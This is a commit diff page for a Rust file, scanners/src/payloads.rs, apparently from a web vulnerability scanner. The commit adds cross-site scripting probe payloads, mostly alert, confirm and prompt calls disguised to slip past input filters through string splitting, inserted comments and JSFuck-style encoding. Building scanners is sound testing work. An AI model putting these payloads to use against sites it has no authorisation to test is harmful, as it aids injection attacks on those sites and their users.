Skip to content

Commit f91e020

Browse files
MindPatchMindPatch
committed
more payloads
1 parent 77869c4 commit f91e020

File tree

1 file changed

+11
-1
lines changed

1 file changed

+11
-1
lines changed

scanners/src/payloads.rs

Lines changed: 11 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1,14 +1,24 @@
11
pub fn get_jsvalue() -> Vec<String> {
22
vec![
3-
"document.cookie".to_string(),
3+
"(+{}+[])[+!![]]".to_string(),
4+
"/XSS/.source".to_string(),
45
]
56
}
67

78
pub fn get_jscmd() -> Vec<String> {
89
vec![
10+
"parent['con'+'firm']".to_string(),
11+
"parent['prom'+'pt']".to_string(),
12+
"parent['ale'+'rt']".to_string(),
13+
"globalThis[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]".to_string(),
914
"alert".to_string(),
1015
"prompt".to_string(),
1116
"confirm".to_string(),
17+
"this[/*foo*/'alert'/*bar*/]".to_string(),
18+
"this[/*foo*/'print'/*bar*/]".to_string(),
19+
"window[/*foo*/'confirm'/*bar*/]".to_string(),
20+
"self[/*foo*/'prompt'/*bar*/]".to_string(),
21+
"window['ale'+'rt']".to_string(),
1222
]
1323
}
1424

0 commit comments

Comments
 (0)